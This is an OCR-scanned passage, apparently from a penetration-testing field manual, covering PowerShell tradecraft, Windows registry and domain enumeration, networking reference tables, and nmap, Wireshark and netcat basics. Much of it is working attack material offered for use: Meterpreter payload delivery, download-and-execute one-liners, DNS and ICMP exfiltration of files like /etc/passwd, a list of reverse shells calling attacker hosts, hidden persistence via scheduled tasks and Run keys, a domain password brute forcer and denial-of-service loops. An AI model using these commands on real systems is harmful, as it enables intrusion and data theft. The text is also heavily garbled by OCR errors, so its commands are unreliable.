at \\ip time "Powershell -Command 'Enable-PSRemoting -Force'"
at \\ip time+1 "Powershell -Command 'Set-Item
wsman:\localhost\client\trustedhosts ''"
at \ \ip time+2 "Powershell -Command 'Restart-Service WinRl-1'"
Enter-PSSession -ComputerName ip -Credential username

LIST HOSTNAME AND IP FOR ALL DOMAIN COMPUTERS
Get-WmiObject -ComputerName DC -Namespace root\microsoftDNS -Class
l1icrosoftDNS _ ResourceRecord -Filter
DOl1AIN '" I select
textrepresentation

POWERSHELL DOWNLOAD OF A FILE FROM A SPECIFIED LOCATION
powershell.exe -noprofile -noninteractive -command
"[System.Net.ServicePointManager] ::ServerCertificateValidationCallback
{$true);
YOUR SPECIFIED IP I file.zip """;
$destination= 111111 C:\rnaster.zip 111111 ;-$http = new-object Systern.Net.WebClient;
$http.DownloadFile($source, $destination);"

POWERSHELL DATA EXFIL
Script will send a file ($filepath) via http to server ($server) via POST
request. Must have web server listening on port designated in the $server
powershell.exe -noprofile -noninteractive -command

"[S;stem.Net.ServicePointManager] ::ServerCertificateValidationCallback
{$true);
YOUR SPECIFIED IP I folder """;
$filepath=" 1111 C:\rnaster.zip 111111 i

$http= new=object System.Net.WebClient;

$http.UploadFile($server,$filepath);"
23

USING POWERSHELL TO LAUNCH METERPRETER FROM MEMORY
Need Metasploit v4.5+ (msfvenom supports Powershell)
Use Powershell (x86) with 32 bit Meterpreter payloads
encodeMeterpreter.psl script can be found on next page

ON ATTACK BOXES
1.
2.
3.
4.
5.

./msfvenom -p Wlndows/meterpreter/reverse https -f psh -a x86
LHOST=l.l.l.l LPORT=443
audit.psl
Move audit.psl into same folder as encodeMeterpreter.psl
Launch Powershell (x86)
powershell.exe -executionpolicy bypass encodeMeterpreter.psl
Copy the encoded Meterpreter string

START LISTENER ON ATTACK BOX
1.
2.
3.
4.
5.
6.

./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse https
set LHOST 1. 1. 1. 1
set LPORT 443
exploit -j

ON TARGET (MUST USE POWERSHELL (x86))
1.

powershell. exe -noexi t -encodedCommand
string here

paste encoded

PROFIT

ENCODEMETERPRETER. PSl [7]
# Get Contents of Script
$contents = Get-Content audit.psl
# Compress Script
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]: :Compress
$cs =New-Object IO.Compression.DeflateStream ($ms,$action)
$sw =New-Object IO.StreamWriter ($cs, [Text.Encoding] ::ASCII)
$contents I ForEach-Object {$sw.WriteLine($ I)
$sw.Close()

# Base64 Encode Stream
$code= [Convert]: :ToBase64String($ms.ToArray())
$command= "Invoke-Expression '$(New-Object IO.StreamReader('$(New-Object
IO. Compression. DeflateStream ('$(New-Object IO. t4emoryStream
(, '$ ( [Convert] : : FromBase64String ('"$code'") ) I I ,
:Decompress) I,
[Text.Encoding]: :ASCII)) .ReadToEnd() ;"
# Invoke-Expression $command
$bytes= [System.Text.Encoding] ::Unicode.GetBytes($command)
$encodedCommand = [Convert]: :ToBase64String($bytes)
# Write to Standard Out
Write-Host $encodedCommand
Copyright 2012 TrustedSec, LLC. All rights reserved.
Please see reference [7] for disclaimer

24

USING POWERSHELL TO LAUNCH METERPRETER

(2ND METHOD)

ON BT ATTACK BOX
1.

rnsfpajload windows/rneterpreter/reverse tcp
R I rnsfencode -t psh -a x86

ON WINDOWS ATTACK BOX
1.
2.

3.
4.

5.
6.

c:\ powershell
' PASTE THE CONTENTS OF THE PSH SCRIPT HERE
PS c:\ $crnd
PS c:\ $u
[Sjstern.Text.Encoding]: :Unicode.GetBytes($crnd)
$e
PS c: \
[Convert] ::ToBase64String($u)
PS c:\
$e
Copf contents of $e

'

START LISTENER ON ATTACK BOX
1.

2.
3.
4.
5.
6.

./rnsfconsole
use exploit/multi/handler
set pajload windows/rneterpreter/reverse tcp
set LHOST 1.1.1.1
set LPORT 8080
exploit -j

ON TARGET SHELL ( 1 : DOWNLOAD SHELLCODE, 2 : EXECUTE)
1.

c: \

powershell -noprofile -noninteracti ve -command " &

2.

Sjstern.Net.WebClient;$client.DownloadFile('http://1.1.1.1/shell.txt
', 'c:\windows\ternp\ shell.txt') )"
c: \
powershell -noprofile -noninteracti ve -noexi t -command 11 &
'c:\windows\ternp\ shell.txt';powershell -noprofilenoninteractive -noexit -encodedCornmand $cmd} 11

PROFIT

25

WINDOWS REGISTRY
OS INFORMATION
HKLM\Software\Microsoft\Windows NT\CurrentVersion

PRODUCT NAME
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v
ProductNarne

DATE OF INSTALL
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v InstallDate

REGISTERED OWNER
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v RegisteredOwner

SYSTEM ROOT
NT\CurrentVersion /v SjstemRoot

TIME ZONE

(OFFSET IN MINUTES FROM UTC)

HKLM\Sjstem\CurrentControlSet\Control\TimeZoneinformation /v ActiveTirneBias

MAPPED NETWORK DRIVES
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive
MRU

MoUNTED DEVICES
HKLM\Sjstern\MountedDevices

USB DEVICES
HKLM\Sjstern\CurrentControlSet\Enurn\USBStor

TURN ON IP FORWARDING
IPEnableRouter

=

PASSWORD KEYS :

1

LSA SECRETS CAN CONTAIN VPN 1 AUTOLOGON 1 OTHER

PASSWORDS
HKEY LOCAL MACHINE\Securitj\Policy\Secrets
\t1icroso ft \Windows NT\CurrentVersion \Winlogon \autoadminlogon

AUDIT POLICY
HKLM\Security\Policj\?olAdTev
26

KERNEL/USER SERVICES
HKLM\Software\Microsoft\Windows NT\CurrentControlSet\Services

INSTALLED SOFTWARE ON MACHINE
HKLt1\Software

INSTALLED SOFTWARE FOR USER
HKCU\Software

RECENT DOCUMENTS
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs

RECENT USER LOCATIONS
dtmu & \Opensavetmu

TYPED URLs
HKCU\Software\Microsoft\Internet Explorer\TjpedURLs

MRU LISTS
HKCU\ Software \:ci erose ft \Windows\ Cur rentVer s ion\ Explorer \Runt1RU

LAST REGISTRY KEY ACCESSED
HKCU\Software\l1icrosoft\Windows\CurrentVersion\Applets\RegEdit /v LastKeJ

STARTUP LOCATIONS
HKLl1\Soft'..;are \t1icroso:t \ 1/'Jindows \CurrentVers on \Run & \Runonce
HKLM\SOFTWARE\Microsoft\Windows\CurrentVers on\Policies\Explorer\Run
HKCU\Software\Microsoft\Windows\CurrentVers on\Run & \Runonce
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load & \Run

2-

ENUMERATING WINDOWS DOMAIN WITH DSQUERY
LIST USERS ON DOMAIN WITH NO LIMIT ON RESULTS
dsquery user -limit 0

LIST GROUPS FOR DOMAIN=VICTIM.COM
dsquery group ''cn=users, dc=victim, dc=com''

LIST DOMAIN ADMIN ACCOUNTS
dsquerj group -name "domain admins 11

i.

dsget group -members -expand

LIST ALL GROUPS FOR A USER
dsquery user -name bob 1

I dsget user -memberof -expand

GET A USER'S LOGIN ID
dsquerj user -name

i

dsget user -samid

LIST ACCOUNTS INACTIVE FOR

2 WEEKS

dsquery user -inactive 2

ADD DOMAIN USER
dsadd user ''CN=Bob,CN=Users,DC=victim,DC=corn'' -samid bob -pwd bobpass11
-pwdneverexpires jes -rnemberof "CI';=Domain
Admins,CN=Users,DC=victim,DC=com

displaj "Bob

DELETE USER
dsrm -subtree -noprornpt ''CN=Bob,CN=Users,DC=victim,DC=com''

LIST ALL OPERATING SYSTEMS ON DOMAIN
dsquerJ A ''DC=victim,DC=com'' -scope subtree -attr ''en''
''operatingSjstemServicePack'' -filter
11 (& (objectclass=computer) (objectcategorJ=computer) (operatingSjstem=Windows}

I I"

LIST ALL SITE NAMES
dsquerJ site -o rdn

LIST ALL SUBNETS WITHIN A SITE
dsquery subnet -site

sitename

-o rdn

LIST ALL SERVERS WITHIN A SITE
dsquerJ server -site

sitename

-o rdn
28

FXND SERVERS XN THE DOMAIN
dsquery ' domainroot -filter
" (&

) ) " -limit 0

DOMAIN CONTROLLERS PER SXTE
dsquery

J

''CN=Sites,CN=Configuration,DC=forestRootDomain'' -filter

29

WINDOWS SCRIPTING
) If scripting in batch file,

variables must be preceeded with %%,

i.e. %%i

NESTED FOR LOOP PING SWEEP
for /L %i in (10,1,254) do@ (for /L %x in (10,1,254)
10.10.%i.%x 2 nul 1 find "Reply" && echo 10.10.%i.%x

do@ ping -n 1 -w 100
live.txt)

LOOP THROUGH FILE
for /F %i in

I file I do

command

DOMAIN BRUTE FORCER
for /F %n in (names.txt) do for /F %pin (pawds.txt) do net use \\DC01\IPC$
/user: domain \%n %p 1 NUL 2 &1 && echo %n:%p && net use /delete
\\DCOl\IPC$
NUL

ACCOUNT LOCKOUT

(LOCKOUT. BAT)

@echo Test run:
for /f %%U in (list.txt) do @for /1 %%C in
1234\c$ /USER:%%U wrongpass

(1,1,5)

do @echo net use \\WIN-

DHCP EXHAUSTION
for /L %i in (2,1,254) do
netrnask
gw
1.1.1.%i

(netsh interface ip set address local static
%1 ping 12- .0.0.1 -n l -w 10000
nul %1)

DNS REVERSE LOOKUP
for /L %i in (100, 1, 105)
dns.txt && echo Server:

SEARCH FOR FILES BEGINNING WITH THE WORD
IT

1

I findstr /i /c:''Name''

do @ nslookup l.l.l.%i
1.1.1.%i
dns.txt

11

PASS 11 AND THEN PRINT IF

S A DIRECTORY, FILE DATE/TIME, RELATIVE PATH, ACTUAL PATH AND

SIZE

(@VARIABLES ARE OPTIONAL)

forfi1es /P c:\ternp /s /rn pass' -c "crnd /c echo @isdir @fdate @ftirne
@relpath @path @fsize"

SIMULATE MALICIOUS DOMAIN CALLOUTS

(USEFUL FOR AV/IDS TESTING)

Run packet capture on attack domain to receive callout
domains.txt should contain known malicious domains
for /L %i in (0,1,100) do (for /F %n in (domains.txt) do nslookup %n
attack domain
NUL 2 &1 & ping -n 5 12-.0.0.1
NUL 2 &1

IE

WEB LOOPER

(TRAFFIC GENERATOR)

for /L %C in (1,1,5000) do @for %U in (www.Jahoo.com www.pastebin.com
www.pajpal.com www.craigslist.org www.google.com) do start /b iexplore %U &
ping -n 6 localhost & taskkill /F /IM iexplore.exe
38

tlai/)'

rnrt

Y"

-7

-

_,

GET PERMISSIONS ON SERVICE EXECUTABLES
for /f ''tokens=2 delims='=''' %a in ('wmic service list full
''pathname'' I find /i /v
do @echo %a
c:\windows\temp\3afd4ga.tmp
for /f eol = ''
/c icacls ''%a''

delims = '' %a in

ROLLING REBOOT

lfind /i

(c:\windows\temp\3afd4ga.tmp)

do cmd.exe

(REPLACE /R WITH /S FOR A SHUTDOWN) :

for /L %i in (2,1,254)
message''

do shutdown /r /m \\l.l.l.%i /f /t 0 /c "Reboot

SHELL ESCALATION USING VBS

(NEED ELEVATED CREDENTIALS)

# Create .vbs script with the following
Set shell ' wscript.createobject(''wscript.shell'')
Shell.run ''runas /user: user
'' & '''''''' &
C:\Windows\SJstem32\WindowsPowershell\vl.O\powershell.exe -WindowStJle
hidden -NoLogo
-ep bjpass -nop -c \'' & '''''''' & ''IEX ((NewObject Net.WEbClieil':).down:oadstring(' url '))\" & """" & """"
wscript.sleep (100)
shell.Sendkejs '' password '' & ''{ENTER}''

31

TASK

SCHEDULER

' Scheduled tasks binary paths CANNOT contain spaces because everjthing
after the first space in the path is considered to be a command-line
argument. Enclose the /TR path parameter between backslash (\) AND
quotation marks ("):
... /TR "\"C:\Program Files\file.exe\" -x argl"

TASK SCHEDULER (ST=START TIME,

SD=START DATE, ED=END DATE)

*MUST BE ADMIN
SCHTASKS /CREATE /TN Task Name /SC HOURLY /ST HH:MM /F /RL HIGHEST /SD
MM/DD/YYYY /ED l1M/DD/YYYY /tr "C:\mj.exe" /RU DOl1AIN\ user /RP
password

TASK SCHEDULER PERSISTENCE [10]
'For 64 bit use:
"C:\Windows\sjswow64\WindowsPowerShell\vl.O\powershell.exe"
# (x86) on User Login
SCHTASKS /CREATE /TN Task Name /TR
"C:\Windows\System32\WindowsPowerShell\vl.O\powershell.exe -WindowStyle
hidden -NoLogo -Noninteractive -ep bypass -nap -c 'IEX ((new-object
net.webclient) .downloadstring( ''http:// ip : port I payload'''))'" /SC
onlogon /RU System
# (x86) on System Start
SCHTASKS /CREATE /TN Task Name /TR
"C:\Windows\System32\WindowsPowerShell\vl.O\powershell.exe -WindowStjle
hidden -NoLogo -Noninteractive -ep bypass -nap -c 'IEX ((new-object
net.webclient) .downloadstring(''http:// ip : port I payload'''))'" /SC
onstart /RU System
# (x86) on User Idle (30 Minutes)
SCHTASKS /CREATE /TN Task Name /TR
"C:\Windows\System32\WindowsPowerShell\vl.O\powershell.exe -WindowStyle
hidden -NoLogo -Noninteractive -ep bjpass -nop -c 'IEX ((new-object
net.webclient) .downloadstring(''http:// ip : port I payload'''))'" /SC
onidle /i 30

32

COMMON PORTS
21
22
23
25
49
53
6-;s
69
80
88
110
111
123
135

13-

138
139
143
161
1-9
201
389
443
445
500
514

520
546r
58902
1080
1194
1433/4
1521
1629
204 9
3128
3306
3389
5060
5222
5432
5666
5900
6000
6129
6669001
9001
9090/1
9100

FTP
SSH
Tel net
St1TP
TACACS
DNS
DHCP (UDP)
TFTP (UDP)
HTTP
Kerberos
POP3
RPC
NTP (UDP)
Windows RPC
NetBIOS
NetBIOS
Sl1B
Il1AP
SNHP (UDP)
BGP
AppleTalk
LDAP
HTTPS
SHE
ISAKt1P (UDP)
Sjslog

RIP
DHCPv6
St1TP
Vt1Ware
Socks Proxy
VPN
t1S-SQL
Oracle
DarneWare
NFS
Squid Proxy
t1ySQL
RDP
SIP
Jabber
Postgres
Nagios
VNC
X11
DameWare
IRC
Tor
HSQL
Open fire
Jet Direct

TTL FINGERPRINTING
Windows : 128
Linux
: 64
Network : 255
Solar is : 255

35

IPv4
CLASSFUL
A
B

c

D
E

IP

RANGES

0.0.0.0
128.0.0.0 192.0.0.0 224.0.0.0240.0.0.0 -

12".255.255.255
191.255.255.255
223.255.255.255
239.255.255.255
255.255.255.255

RESERVED RANGES
10.0.0.0
12?.0.0.0
172.16.0.0
192.168.0.0

-

10.255.255.255
12'.255.255.255
1-2.31.255.255
192.168.255.255

SUBNETTING
/31
/30
/29
/28
/2"
/26
/25
/24
/23
/22
/21
/20
/19
/18
/17
/16
/15
/14
/13
/12
/11
/10
/9
/8

255.255.255.254
255.255.255.252
255.255.255.248
255.255.255.240
255.255.255.224
255.255.255.192
255.255.255.128
255.255.255.0
255.255.254.0
255.255.252.0
255.255.248.0
255.255.240.0
255.255.224.0
255.255.192.0
255.255.128.0
255.255.0.0
255.254.0.0
255.252.0.0
255.248.0.0
255.240.0.0
255.224.0.0
255.192.0.0
255.128.0.0
255.0.0.0

1 Host
2 Hosts
6 Hosts
14 Hosts
30 Hosts
62 Hosts
126 Hosts
254 Hosts
510 Hosts
1022 Hosts
2046 Hosts
4094 Hosts
8190 Hosts
16382 Hosts
32?66 Hosts
65534 Hosts
1310"0 Hosts
262142 Hosts
524286 Hosts
1048574 Hosts
209-150 Hosts
4194302 Hosts
8388606 Hosts
16"'"214 Hosts

CALCULATING SUBNET RANGE
Given: 1.1.1.101/28
/28 = 255.255.255.240 netmask
256 - 240 = 16 = subnet ranges of 16, i.e.
1.1.1.0
1.1.1.16
1.1.1.32 ...
Range where given IP falls: 1.1.1.96 - 1.1.1.111

36

IPv6
BROADCAST ADDRESSES
ff02::1ff05::1ff01::2ff02::2ff05::2-

link-local
site-local
node-local
link-local
site-local

nodes
nodes
routers
routers
routers

INTERFACE ADDRESSES
fe80:: -link-local
2001:: - routable
::a.b.c.d- IPv4 compatible IPv6
::ffff:a.b.c.d- IPv4 mapped IPv6

THC IPv6 TOOLKIT
Remote Network DoS:
rsumrf6 eth# remote ipv6

SOCAT TUNNEL IPv6 THROUGH IPv4 TOOLS
socat TCP-LISTEN:8080,reuseaddr,fork TCP6: [2001: :] :80
./nikto.pl -host 12-.0.0.1 -port 8080

r

CISCO COMMANDS

Configure interface
Configure FastEthernet 0/0
Add IP to fa0/0
Configure vtj line
1. Set telnet password
2. Set telnet password
Open sessions
IOS version
Available files
File information
Deleted files
Config loaded in mem
Config loaded at boot
Interfaces
Detailed interface info
Rot:tes
Access lists
No limit on output
Replace run w/ start config
CopJ run config to TFTP Svr

#configure terminal
(config)#interface fa0/0
(config-if)#ip addr 1.1.1.1 255.255.255.0
(config)#line VtJ 0 4
(config-line)#login
(config-line)#password password
#show session
#show version
#dir file SJStems
#dir all-filesjstems
#dir /all
#show running-config
#show startup-config
#show ip interface brief
#show interface eO
#show ip route
#show access-lists
#terminal length 0
#copj running-config startup-config
#cop] running-config tftp

CISCO

IOS 11.2-12.2

VULNERABILITY

http:// ip /level/ 16-99 /exec/show/config

SNMP
MUST START TFTP SERVER
./snmpblow.pl -s
snmpstrings.txt

srcip

1ST

-d

rtr ip

-t

attackerip

-f out.txt

WINDOWS RUNNING SERVICES:
snrnpwalk -c public -v1

ip

1 lgrep hrSWRJnName !cut -d" " -f4

WINDOWS OPEN TCP PORTS :
smpwalk

lgrep tcpConnState !cut -d" " -f6 !sort -u

WINDOWS INSTALLED SOFTWARE:
smpwalk

!grep hrSWinstalledName

WINDOWS USERS:
snmpwalk

ip

1.3

lgrep --.1.2.25

-f4

38

PACKET CAPTURING
CAPTURE

TCP

TRAFFIC ON PORT 22-23

tcpdurnp -nvvX -sO -i ethO tcp portrange 22-23

CAPTURE TRAFFIC TO SPECIFIC
tcpdurnp -I ethO -tttt dst

IP

ip

EXCLUDING SPECIFIC SUBNET

and not net 1.1.1.0/24

CAPTURE TRAFFIC B/W LOCAL-192 .1
tcpdurnp net 192.1.1

CAPTURE TRAFFIC FOR  SECONDS
durnpcap -I ethO -a duration: sec

-w file

file.pcap

REPLAY PCAP
file2cable -i ethO -f file.pcap

REPLAY PACKETS

(rozz

1 DoS)

tcpreplaj --topspeed --loop=O --intf=ethO
rnbps=l0110011000

.pcap_file_to replaj

DNS

'•

DNSRECON
Reverse lookup for IP range:
./dnsrecon.rb -t rvs -i 192.1.1.1,192.1.1.20
Retrieve standard DNS records:
./dnsrecon.rb -t std -d dornain.corn

Enumerate subdornains:
./dnsrecon.rb -t brt -d dornain.corn -w hosts.txt
DNS zone transfer:
./dnsrecon -d dornain.corn -t axfr

NMAP REvERSE DNS LOOKUP AND OUTPUT PARSER
nrnap -R -sL -Pn -dns-servers dns svr ip
range
I awk '{if( ($1" "$2"
"$3)=="Nrnap scan report")print$5" "$6}' I sed 's/(//g' I sed 's/)//g'
dns.txt

39

VPN
WRITE PSK TO FILE
ike-scan -M -A

vpn ip

-P file

DoS VPN SERVER
ike-scan -A -t 1 --sourceip= spoof ip

dst ip

FIKED - FAKE VPN SERVER
Must know the VPN group name
1.

pre-shared ke;

Ettercap filter to drop IPSEC traffic IUDP port 5001
iflip.proto == UDP && udp.scc == 5001 I
kill I I;
drop I I;
msg ("-' ' ' ' 'UDP packet dropped 1 > ' ' -1 " )

2.
3.
4.
5.

6.

8.

;

Compile filter
etterfilter udpdrop.filter -o udpdrop.ef
Start Ettercap and drop all IPSEC
#ettercap -T -g -M arp -F udpdrop.ef II II
Enable IP Forward
echo "1"
lprocls;slnetlipv4lip_forward
Configure IPtables to port forward to Fiked server
iptables -t nat -A PREROUTING -p udp -I ethO -d VPN Server IP
-j
DNAT - - to Attacking Host IP
ipcables -P FORWARD
Start Fiked to impersonate the VPN Server
fiked - g vpn gatewa; ip - k VPN Group Name:Group Pre-Shared Ke;
Stop Ettercap
Restart Ettercap without the filter
ettercap -T -M arp II II

PUTTY
REG KEY TO HAVE PuTTY LOG EVERYTHING (INCLUDING CONVERSATIONS)
"LogFileName"="%TEMP%\putt;.dat"
"LogT;pe"=dword:00000002"

40

FILE TRANSFER

FTP

THROUGH NON-INTERACTIVE SHELL

echo open ip 21
ftp.txt
echo user
ftp.txt
echo pass
ftp.txt
echo bin
ftp.txt
echo GET
file
=tp.txt
echo bfe
ftp.txt
ftp -s:ftp.txt

DNS TRANSFER ON LINUX
On victim:
1.
Hex
the file to be transferred
xxd -p secret
fi:e.hex
2.
Read in each line and do a
lookup
forb in 'cat fole.hex '; do dig $b.shell.evilexample.com; done
On attacker:
1.
Capture DNS exfil packets
tcdpump -w /tmp/dns -sO port 53 and host sjstem.example.com
2.
Cut the exfil!ed hex from
DNS packet
tcpdump -r dnsdemo -n I grep shell.evilexample.com I cut -f9 -d'
cut -fl -d'.' I uniq
received. txt
3.
Reverse the hex encoding
xxd -r -p
kefS.pgp

EXFIL COMMAND OUTPUT ON A LINUX MACHINE OVER

ICMP

On victim (never
l liner) :
stringz-·cat /etc/passwd I od -tx1 I cut -c8- I tr -d " " I tr -d "\n"'
counter-0; while (($counter - ${#stringZ})} ;do ping -s 16 -c l -p
${stringZ:$counter:16} 192.168.10.10 &&
counter=$(
;done
On attacker (capture
to data.dmp and parse}:
tcpdump -ntvvSxs 0 'icmp[C:-a•
data.dmp
grep Ox0020 data.dmp I cut -c21- I tr -d " " I tr -d "\n"

OPEN MAIL RELAY
C:\ telnet x.x.x.x 25
HELO x.x.x.
l1AIL FROl1: me@jou.com
RCPT TO: fOU@;ou.com
DATA
Thank You.
quit

43

I xxd -r -p

REVERSE SHELLS [11 [31 [41
NETCAT

(*

START LISTENER ON ATTACK BOX TO CATCH SHELL)
Linux reverse shell
Windows reverse shell

nc 10.0.0.1 1234 -e /bin/sh
nc 10.0.0.1 1234 -e cmd.exe

NETCAT (SOME VERSIONS DON'T SUPPORT -E OPTION)
nc -e /bin/sh 10.0.0.1 1234

NETCAT WORK-AROUND WHEN -E OPTION NOT POSSIBLE
rm /tmp/f;mkfifo /tmp/f;cat /tmp/fl/bin/sh -i 2 &line l0.0.0.1 1234

/tmp/f

PERL
perl -e 'use Socket;
socket(S,PF INET, SOCK STREAt1,
getprotobjname("tcp") I; if(connect(S,sockaddr in($p,inet-aton($i) I iT!
open(STDIN," &S") ;open(STDOUT," &S");
&8"17 exec("/bin/shi" I; l ; '

PERL WITHOUT /BIN/SH
perl -t1IO -e
IO: :Socket: :INET(PeerAddr,"attackerip:4444") ;STDIN- fdopen($c,r) ;$-fdopen($c,w) ;sjsteffi$ while
·'

PERL FOR WINDOWS
perl -MIO -e '$c=new IO: :Socket: :INET(PeerAddr,''attackerip:4444'') ;STDINfdopen($c,r) ;$-- fdopen($c,w) ;system$ while
·'

PYTHON
python -c 'import socket, subprocess, os; s=socket. socket (socket ..;;F_ INET,
socket.SOCK_STREAL1); s.connect( ("10.0.0.1",1234)); os.dup2 (s.fileno() ,0);
os.dup2(s.fileno(l,1); os.dup2(s.file:oo(),2);
1"/bin/sh","-i"] I;'

BASH
bash -i

& /dev/tcp/10.0.0.1/8080 0 &1

JAVA
r
Runtime.getRuntime()
p
r.exec( 1"/bin/bash","-c","exec 5 /dev/tcp/10.0.0.1/2CJ2;cat
while read line; do \$:ine 2 &5 &5; done"] as String[])
p.waitFor()

&5

1

PHP
php -r

1234) ;exec("/bin/sh -i

44

&3

&3 2 &3");'

RUBY
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234) .to i; exec
sprintf("/bin/sh -i &%d &%d 2 &%d",f,f,f)'

RUBY WITHOUT /BIN/ SB
by -rsocket -e 'exit if
fork;c=TCPSocket.new("attackerip","4444");while(crnd=c.gets);IO.popen(cmd,

11

r

"I { liolc.print io.read}end'

RUBY FOR WINDOWS
ruby -rsocket -e
'c=TCPSocket.new("attacY..erip","4444");while(crnd=c.gets);IO.popen{cmd,"r
iolc.print io.read}end'

11 )

TELNET
rm -f /tmp/p; mknod /tmp/p p && telnet attacl:erip 4444 0/tmp/p
--OR-telnet attacl:erip 4444 I /bin/bash I telnet attackerip 4445

XTERM
xterm -displaj 10.0.0.1:1
o Start Listener: Xnest :1
o Add permission to connect: xhost +victimiP

Mise
wget hhtp:// server /backdoor.sh -0- I sh

45

Downloads and runs backdoor.sh

{I

PERSISTENCE
FOR LINUX PERSISTENCE

(ON ATTACK BOX)

crontab -e : set for every 10 min
0-59/10 ' ' ' ' nc ip 7"" -e /bin/bash

WINDOWS TASK SCHEDULER PERSISTENCE
sc config schedule
net start schedule
at 13:30 ''''C:\nc.exe

(START TASK SCHEDULER)

auto
ip

-e cmd.exe''''

WINDOWS PERSISTENT BACKDOOR WITH FIREWALL BYPASS
1.
2.
3.

REG add HKEY CURRENT USER\Software\l1icrosoft\Windows\CurrentVersion\Run
/v firewall 7t REG SZ /d "c:\windows\system32\backdoor.exe" /f
at 19:00 /every:t1,T,W,Th,F cmd /c start "%USERPROFILE%\backdoor.exe"
SCHTASKS /Create /RU "SYSTEt1" /SC l1INUTE /t10 45 /TN FIREWALL /TR
"%USERPROFILE%\backdoor.exe" /ED 12/12/2012

REMoTE PAYLOAD DEPLO"!MENT VIA
Via
1.
2.
3.

SMB

OR WEBDAV [

6]

SMB:
From the compromised machine, share the payload folder
Set sharing to 'Everyone'
Use psexec or wmic command to remotely execute payload

Via WebDAV:
1.
Launch Metasploit 'webdav file server' module
2.
Set following options:
payload
payload directory
3.

Use psexec or wmic command to remotely execute payload

psexec \\ remote ip
ip \test\msf.exe"

/u domain\compromised_user /p password "\\payload

OR wmic /node: remote ip /user:domain\compromised user //password:password
process call create "\ \ payload ip \test\msf.exe"

46

TUNNELING
FPIPE -

LISTEN ON

fpipe.exe

l

1234

AND FORWARD TO PORT

80

ON

2. 2. 2. 2

1234 -r 80 2.2.2.2

SOCKS.EXE- SCAN INTRANET THROUGH SOCKS PROXY
On redirector (1.1.1.1):
socks.exe -i1.1.1.1 -p 8C80
On attacker:
Modifj /etc/proxjchains.conf:
Comment out:
Comment out:
9050
Add line:
socks4
1.1.1.1
8080
Scan through socks prox1:
proxjchains nmap -PN -vv -sT -p 22,135,139,445 2.2.2.2

SOCAT -

LISTEN ON

1234

AND FORWARD TO PORT

80

ON

2. 2. 2. 2

TCP4:LISTEN:1234 TCP4:2.2.2.2:80

STUNNEL -

SSL ENCAPSULATED

0!1 attacker (client):
Modifj /stunnel.conf
clien:. = jes
[netcat client]
accept
5555
connect

NC

TUNNEL

IP-:4444

On victim (listening server)

l1odifJ /s:.unnel.conf
client

C:\

=

no
server]
4444

accept
connect =
nc -vlp ----

On attacker
# nc -nv 12-.0.C.1 5555

q-

(WINDOWS & LINUX)

[

8]

GoOGLE HACKING
one
search within a number range
search within past [#] months
find pages that link to [url]
find pages related to [url]
find pages with [string] in title
find pages with [string] in url
find files that are xls
find phone book listings of [name]

numrange: [#]-[#]
date: [ #]
link: [url]
related: [url]
intitle: [string]
inurl: [string]
filetjpe: [xls]
phonebook: [name]

VIDEO TELECONFERENCING
POLYCOM

telnet ip
#Enter 1 char, get uname:pwd
http:// ip /getsecure.cgi
http:// ip /era rcl.htm
http:// ip /a securitj.htm
http:// ip /a-rc.htm

TANDBERG
http:// ip /snapctrl.ssi
SONY WEBCAM

http:// ip
8101046202FF : Freeze Camera

str

NMAP
SCAN TYPES
-sP
-ss
-sT

ping scan
syn scan
connect scan

-su

udp scan

-so

protocol scan

OPTIONS
-pl-65535
-T[0-5]

ports

-sv : version detection

-n

no dns resolution

-PN : no ping
-6
: IPv6 scan

-0
-A

OS detection

--randomize-hosts

OUTPUT

aggressive scan

I INPUT

-ox file
-oG file
-oA file
-iL file
-exclude file

file

write to xml file
write to grep file
save as all 3 formats
read hosts from file
excludes hosts in file

OPTIONS
-sV -p#
-trace route

-ttl : set TTL
--script script.

FIREWALL EVASION
-f

-s

ip
-g #
-D ip , ip
--mtu #

CONVERT

--spoof-mac mac
--data-length size
(append random data)
--scan-delay 5s

fragment packets
spoof src
spoof src port
Decoy
set l1TU size

NMAP XML

FILE TO

HTML:

xsltproc nmap.xml -o nmap.html

GENERATE LIVE HOST FILE:
nmap -sP -n -oX out.xml 1.1.1.0/24 2.2.2.0/24
5
live hosts.txt

I grep "Nmap" I cut -d " " -f

COMPARE NMAP RESULTS
ndiff scanl.xml scan2.xml

DNS REVERSE LOOKUP ON IP RANGE
nmap -R -sL -dns-server

IDS TEST

server

1.1.1.0/24

(XMAS SCAN WITH DECOY IPS AND SPOOFING)

for x in {l .. lOOOO .. l);do nmap -T5 -sX -S spoof-source-IP -D commaseperated with no spaces list of decoy IPs --spoof-mac aa:bb:cc:dd:ee:ff e ethO -Pn targeted-IP. ;done
51

WIRE SHARK
eth.addr/eth.dst.eth.src
rip.auth.passwd
ip.addr/ip.dst/ip.src (ipv6.)
tcp.port/tcp.dstport/tcp.srcport
tcp.flags (ack,fin,push,reset,syn,urg)
udp.port/udp.dstport/udp.srcport
http.authbasic
http.www_authentication
http.data
http.cookie
http.referer
http.server
http.user agent
wlan.fc.type eq 0
wlan.fc.type eq 1
wlan.fc.type eq 0
wlan.fc.type subtype eq 0
wlan.fc.type_subtype eq 2
wlan.fc.type_subtype eq 4
wlan.fc.type_subtype eq 8
wlan.fc.type subtype eq 10
wlan.fc.type=subtype eq 11

COMPARISON OPERATORS
eq OR
ne OR
gt OR
l t OR
ge OR
le OR

LOGICAL OPERATORS
and OR &&
or OR II
xor OR
not OR !

52

MAC
RIP password
IP
TCP ports
TCP flags
UDP ports
Basic authentication
HTTP authentication
HTTP data portion
HTTP cookie
HTTP referer
HTTP Server
HTTP user agent string
802.11 management frame
802.11 control frame
802.11 data frame
802.11 association request
802.11 reassociation req
802.11 probe request
802.11 beacon
802.11 disassociate
802.11 authenticate

NET CAT

BAs :res
Connect to [TargetiP] Listener on [port]:
$ nc [ Targeti P] [port]
Start Listener:
$ nc -1 -p [port]

PORT SCANNER
TCP Port Scanner in port range [startPort] to [endPort]:
$ nc -v -n -z -wl [TargetiP] [startPort]-[endPort]

Fl:LE TRANSFERS
Grab a [filename] from a Listener:
1.
Start Listener to push [filename]
